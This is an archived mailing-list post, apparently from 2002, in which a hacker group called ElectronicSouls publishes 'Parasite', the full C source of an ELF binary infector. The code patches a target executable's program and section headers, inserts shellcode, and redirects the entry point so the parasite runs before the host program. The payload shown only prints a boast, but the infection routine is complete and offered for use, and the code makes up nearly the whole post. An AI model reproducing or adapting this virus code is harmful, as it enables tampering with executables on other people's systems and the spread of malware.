lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Parasite

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

As many have observed, we have only recently become 4553, after losing
our domain (electronicsouls.org).  We don't leak our 4553 codes, because
they are too recent to go public.

Please enjoy.

# cat 4553text-pad-para.c
/*
 *
 * CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONICSOULS CREW !
 * DO NOT FSCKING DISTRIBUTE !!!
 *
 * 0x4553-txt-segment.c
 * (C) BrainStorm  [ElectronicSouls]
 *
 * thanks to SectorX and ghQst!
 * greetz to all ES + old XOR members and void.ru :)
 *
 */

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <elf.h>
#include <unistd.h>

#define VERSION "0.1.b"

void Insert(char *filename, int fd, char *v, int len)
{
	struct stat st;
	char *woot;
	int es, i;

	if (fstat(fd, &st) < 0) {
        perror("fstat");exit(1);
	}
	printf("-+- Host Size: %i\n", st.st_size);
	woot = (char *)malloc(st.st_size);
	if (woot == NULL) {
	perror("malloc");exit(1);
	}
	es = open("es.vir", O_WRONLY | O_CREAT | O_EXCL, st.st_mode);
	if (es < 0) {
	perror("open");exit(1);}
	if (lseek(fd, 0, SEEK_SET) < 0) {
	perror("lseek");exit(1);
        }
	if (read(fd, woot, 400) < 0) {
	perror("read");exit(1);
        }
        if (write(es, woot, 400) < 0) {
	perror("write");exit(1);
        }
	if (lseek(fd, 0, SEEK_SET) < 0) {
	perror("lseek");exit(1);
        }
	if (read(fd, woot, st.st_size) < 0) {
	perror("read");exit(1);
        }
	printf("-+- Copying Parasite(%i) at offset %i\n",len, lseek(es, 0, SEEK_CUR));
	if (write(es, v, len) < 0) {
	perror("write");exit(1);
        }
	if (write(es, woot, st.st_size) < 0) {
	perror("write");exit(1);
	}
	if (rename("es.vir", filename) < 0) {
	perror("rename");exit(1);
	}
}

void Attach(char *filename, char *v, int len, int e)
{
   Elf32_Ehdr ehdr;
   Elf32_Shdr *shdr;
   Elf32_Phdr *phdr;

   char *woot, *sd;
   int i, offset, move = 0, fd;

   fd = open(filename, O_RDWR);
   if (fd < 0) {
   perror("open");exit(1);
   }
   if (read(fd, &ehdr, sizeof(ehdr)) < 0) {      /* read ehdr */
   perror("read");
   exit(1);
   }
    printf("-+- Host Entry Point: %x\n", ehdr.e_entry); /* modify the parasite so it knows the correct re-entry point */
    *(int *)&v[e] = ehdr.e_entry;

      woot = (char *)malloc(sizeof(*phdr)*ehdr.e_phnum);
      if (woot == NULL) {
      perror("malloc");exit(1);
      }
      if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {             /* read phdr's */
      perror("lseek");exit(1);
      }
      if (read(fd, woot, sizeof(*phdr)*ehdr.e_phnum) < 0) {
      perror("read");exit(1);
      }
        phdr = (Elf32_Phdr *)woot;
        for (i = 0; i < ehdr.e_phnum; i++) {
        if (phdr->p_type != PT_DYNAMIC) {
        if (move) { phdr->p_offset += 4096; } else if (phdr->p_type == PT_LOAD && !phdr->p_offset)
        {

	phdr->p_vaddr -= 4096;
	phdr->p_paddr -= 4096;
	phdr->p_filesz += 4096;
	phdr->p_memsz += 4096;

	ehdr.e_entry = phdr->p_vaddr + 400;
        printf("------------------------------------------------\n");
        printf("-+- Segment type:             %i\n", phdr->p_type);
        printf("-+- Segment file offset:      %i\n", phdr->p_offset);
        printf("-+- Segment virtual address:  0x%x\n", phdr->p_vaddr);
        printf("-+- Segment physical address: 0x%x\n", phdr->p_paddr);
	printf("-+- Segment size in file:     %i\n", phdr->p_filesz);
	printf("-+- Segment size in memory:   %i\n", phdr->p_memsz);
        printf("-+- Segment flags:            %i\n", phdr->p_flags);
        printf("-+- Segment alignment:        %i\n", phdr->p_align);
        printf("------------------------------------------------\n");
	move = 1;
	}
	}
	++phdr;
	}
	sd = (char *)malloc(sizeof(*shdr)*ehdr.e_shnum);
	if (woot == NULL) {
	perror("malloc");exit(1);
	}
	if (lseek(fd, ehdr.e_shoff, SEEK_SET) < 0) {              /* read shdr's */
	perror("lseek");exit(1);
	}
	if (read(fd, sd, sizeof(*shdr)*ehdr.e_shnum) < 0) {
	perror("read");	exit(1);
	}
	shdr = (Elf32_Shdr *)sd;
	for (i = 0; i < ehdr.e_shnum; i++) {
	shdr->sh_offset += 4096;
	++shdr;
	}
	if (lseek(fd, ehdr.e_shoff, SEEK_SET) < 0) {
	perror("lseek");exit(1);
	}
	if (write(fd, sd, sizeof(*shdr)*ehdr.e_shnum) < 0) {
	perror("read");exit(1);
	}
	free(sd);
	if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {
	perror("lseek");exit(1);
	}
	if (write(fd, woot, sizeof(*phdr)*ehdr.e_phnum) < 0) {
	perror("read");exit(1);
	}
	free(woot);

	ehdr.e_shoff += 4096;
	ehdr.e_phoff += 4096;

	if (lseek(fd, 0, SEEK_SET) < 0) {
	perror("lseek");exit(1);
	}
	if (write(fd, &ehdr, sizeof(ehdr)) < 0) {
	perror("write");exit(1);
	}
	Insert(filename,fd,v,len);        /* insert the parasite */
}

int main(int argc, char *argv[])
{
    int e = 33;
    char v[3696] =
		"\x57"			/*	pushl  %edi	*/
		"\x56"			/*	pushl  %esi	*/
		"\x50"			/*	pushl  %eax	*/
		"\x53"			/*	pushl  %ebx	*/
		"\x51"			/*	pushl  %ecx	*/
		"\x52"			/*	pushl  %edx	*/
		"\xeb\x1f"		/* jmp msg_jmp		*/
		"\x59"			/* popl %ecx		*/
		"\xb8\x04\x00\x00\x00"	/* movl $4, %eax	*/
		"\xbb\x01\x00\x00\x00"	/* movl $1, %ebx	*/
		"\xba\x0e\x00\x00\x00"	/* movl $14,%edx	*/
		"\xcd\x80"		/* int $0x80		*/
		"\x5a"			/*	popl   %edx	*/
		"\x59"			/*	popl   %ecx	*/
		"\x5b"			/*	popl   %ebx	*/
		"\x58"			/*	popl   %eax	*/
		"\x5e"			/*	popl   %esi	*/
		"\x5f"			/*	popl   %edi	*/
                "\xbd\x00\x00\x00\x00"	/* movl $0x0, %ebp      */
                "\xff\xe5"		/* jmp *%ebp           */
		"\xe8\xdc\xff\xff\xff"	/* call msg_call	*/
		"  0x4553 r0cks!!  \n";

	if (argc != 2) {
        fprintf(stderr, "(C) 0x4553 / 0x5435 - 2002\n");
        fprintf(stderr, "usage: %s <host-2-infect> \n",argv[0]);exit(1);
	}

        fprintf(stderr, "\n  [ ElectronicSouls - ELF Text Pad infector ] \n");
        fprintf(stderr, "    Version:   %s \n\n\n",VERSION);
        fprintf(stderr, "-!- Trying to infect: %s \n",argv[1]);
	Attach(argv[1],v,sizeof(v),e);
        fprintf(stderr, "-*- %s is infected!\n",argv[1]);
        printf("------------------------------------------------\n\n");
   exit(0);
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Better in bed than Eminem is divineint."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3oHqIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltSoUAoIHEU2YMEr92
tDi/qnD0L88cpm+UAJ9MjIFhdUybyJQLLIoy1n0vydUdRg==
=uIpS
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ